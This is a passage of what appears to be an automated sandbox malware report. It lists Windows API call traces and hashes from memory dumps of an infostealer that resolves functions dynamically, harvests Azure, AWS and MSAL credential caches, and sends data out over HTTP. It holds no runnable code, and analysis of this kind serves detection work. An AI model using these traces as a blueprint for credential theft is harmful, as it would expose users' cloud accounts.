                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 02D29B39
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 02D29B51
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 02D29B6A
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 02D29B82
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 02D29B9A
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 02D29BB3
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 02D29BCB
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 02D29BE3
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 02D29BFC
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 02D29C14
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 02D29C2C
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 02D29C45
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 02D29C5D
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 02D29C75
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 02D29C8E
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 02D29CA6
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 02D29CBE
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 02D29CD7
                                                                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 02D29CEF
                                                                                    • LoadLibraryA.KERNEL32(0064A550,?,02D26C67), ref: 02D29D01
                                                                                    • LoadLibraryA.KERNEL32(0064A17C,?,02D26C67), ref: 02D29D12
                                                                                    • LoadLibraryA.KERNEL32(0064A104,?,02D26C67), ref: 02D29D24
                                                                                    • LoadLibraryA.KERNEL32(0064A1DC,?,02D26C67), ref: 02D29D36
                                                                                    • LoadLibraryA.KERNEL32(0064A328,?,02D26C67), ref: 02D29D47
                                                                                    • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 02D29D69
                                                                                    • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 02D29D8A
                                                                                    • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 02D29DA2
                                                                                    • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 02D29DC4
                                                                                    • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 02D29DE5
                                                                                    • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 02D29E06
                                                                                    • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 02D29E1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 2238633743-0
                                                                                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                    • Instruction ID: 9a46828508de6c0879a7f5fd6feead2daaf6dd9df55b6b7e50db85a22b6e179f
                                                                                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                    • Instruction Fuzzy Hash: 58A14DBD5C0240BFE354EFE8ED989963BFBF74E201714661AE605C3264D739A841DB12
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D19C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02D19C53
                                                                                      • Part of subcall function 02D19C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02D19C78
                                                                                      • Part of subcall function 02D19C27: LocalAlloc.KERNEL32(00000040,?), ref: 02D19C98
                                                                                      • Part of subcall function 02D19C27: ReadFile.KERNEL32(000000FF,?,00000000,02D116F6,00000000), ref: 02D19CC1
                                                                                      • Part of subcall function 02D19C27: LocalFree.KERNEL32(02D116F6), ref: 02D19CF7
                                                                                      • Part of subcall function 02D19C27: CloseHandle.KERNEL32(000000FF), ref: 02D19D01
                                                                                      • Part of subcall function 02D29097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02D290B9
                                                                                    • strtok_s.MSVCRT ref: 02D20582
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 02D205C9
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D205D0
                                                                                    • StrStrA.SHLWAPI(00000000,00421618), ref: 02D205EC
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D205FA
                                                                                      • Part of subcall function 02D28B47: malloc.MSVCRT ref: 02D28B4F
                                                                                      • Part of subcall function 02D28B47: strncpy.MSVCRT ref: 02D28B6A
                                                                                    • StrStrA.SHLWAPI(00000000,00421620), ref: 02D20636
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D20644
                                                                                    • StrStrA.SHLWAPI(00000000,00421628), ref: 02D20680
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D2068E
                                                                                    • StrStrA.SHLWAPI(00000000,00421630), ref: 02D206CA
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D206DC
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D20769
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D20781
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D20799
                                                                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D207B1
                                                                                    • lstrcat.KERNEL32(?,0042164C), ref: 02D207C9
                                                                                    • lstrcat.KERNEL32(?,00421660), ref: 02D207D8
                                                                                    • lstrcat.KERNEL32(?,00421670), ref: 02D207E7
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D207FA
                                                                                    • lstrcat.KERNEL32(?,00421678), ref: 02D20809
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2081C
                                                                                    • lstrcat.KERNEL32(?,0042167C), ref: 02D2082B
                                                                                    • lstrcat.KERNEL32(?,00421680), ref: 02D2083A
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2084D
                                                                                    • lstrcat.KERNEL32(?,00421688), ref: 02D2085C
                                                                                    • lstrcat.KERNEL32(?,0042168C), ref: 02D2086B
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D2087E
                                                                                    • lstrcat.KERNEL32(?,00421698), ref: 02D2088D
                                                                                    • lstrcat.KERNEL32(?,0042169C), ref: 02D2089C
                                                                                    • strtok_s.MSVCRT ref: 02D208E0
                                                                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 02D208F5
                                                                                    • memset.MSVCRT ref: 02D20944
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                    • String ID:
                                                                                    • API String ID: 3689735781-0
                                                                                    • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                                                    • Instruction ID: 165a19875b86c238d7f586339804d5c3030f142735ef4ec0978abcedf27838d8
                                                                                    • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                                                    • Instruction Fuzzy Hash: 9ED13B75A40228ABCB04FBF0DD95EEEB77AEF24705F504519E102A6290DF34AE09CF61
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                                                    • StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00405A13
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02E3B510,00000000,?,02E04F00,00000000,?,00421A1C), ref: 00405E71
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                                                    • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                                                    • memcpy.MSVCRT(?), ref: 00405EFE
                                                                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                                                    • HttpOpenRequestA.WININET(00000000,02E3B650,?,02E3AE58,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                    • String ID: "$"$------$------$------
                                                                                    • API String ID: 1406981993-2180234286
                                                                                    • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                                                    • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                                                    • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                                                    • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00414D87
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                                                    • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    • memset.MSVCRT ref: 00414E13
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                                                    • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                    • memset.MSVCRT ref: 00414E9F
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                                                    • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                                                      • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02E35C40,?,000003E8), ref: 00414A4A
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                                                      • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                                                      • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                                                    • memset.MSVCRT ref: 00414F2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                                                    • API String ID: 4017274736-156832076
                                                                                    • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                                                    • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                                                    • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                                                    • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02D1D1EA
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02D1D32E
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D1D335
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D46F
                                                                                    • lstrcat.KERNEL32(?,00421478), ref: 02D1D47E
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D491
                                                                                    • lstrcat.KERNEL32(?,0042147C), ref: 02D1D4A0
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D4B3
                                                                                    • lstrcat.KERNEL32(?,00421480), ref: 02D1D4C2
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D4D5
                                                                                    • lstrcat.KERNEL32(?,00421484), ref: 02D1D4E4
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D4F7
                                                                                    • lstrcat.KERNEL32(?,00421488), ref: 02D1D506
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D519
                                                                                    • lstrcat.KERNEL32(?,0042148C), ref: 02D1D528
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D1D53B
                                                                                    • lstrcat.KERNEL32(?,00421490), ref: 02D1D54A
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
                                                                                    • lstrlen.KERNEL32(?), ref: 02D1D591
                                                                                    • lstrlen.KERNEL32(?), ref: 02D1D5A0
                                                                                    • memset.MSVCRT ref: 02D1D5EF
                                                                                      • Part of subcall function 02D2ACD7: StrCmpCA.SHLWAPI(0064A350,02D1AA0E,?,02D1AA0E,0064A350), ref: 02D2ACF6
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 02D1D61B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                    • String ID:
                                                                                    • API String ID: 1973479514-0
                                                                                    • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                                                    • Instruction ID: 389ccd44be6bd91a06bb19d7d04ce72b222bb1b4fcb29ee0dd943d823f9394b8
                                                                                    • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                                                    • Instruction Fuzzy Hash: 9FE13A75950128EBCB08FBE0DD95EEE737AEF24709F504159E106A62A0DE35AE08CF71
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                                                    • lstrcatA.KERNEL32(?,00000000,02E35F00,00421474,02E35F00,00421470,00000000), ref: 0040D208
                                                                                    • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                                                    • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                                                    • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                                                    • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                                                    • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                                                    • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                                                    • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E342B0,?,0042110C,?,00000000), ref: 0041A82B
                                                                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                    • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                                                    • lstrlenA.KERNEL32(?), ref: 0040D339
                                                                                    • memset.MSVCRT ref: 0040D388
                                                                                      • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                                                    • String ID:
                                                                                    • API String ID: 2775534915-0
                                                                                    • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                                                    • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                                                    • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                                                    • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                      • Part of subcall function 02D14A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                      • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02D15C5F
                                                                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 02D15C7A
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02D15DFA
                                                                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 02D160D8
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D160E9
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02D160FA
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D16101
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D16116
                                                                                    • memcpy.MSVCRT(?,00000000,00000000), ref: 02D1612D
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1613F
                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02D16158
                                                                                    • memcpy.MSVCRT(?), ref: 02D16165
                                                                                    • lstrlen.KERNEL32(00000000,?,?), ref: 02D16182
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02D16196
                                                                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 02D161B3
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D16217
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D16224
                                                                                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02D15E5F
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
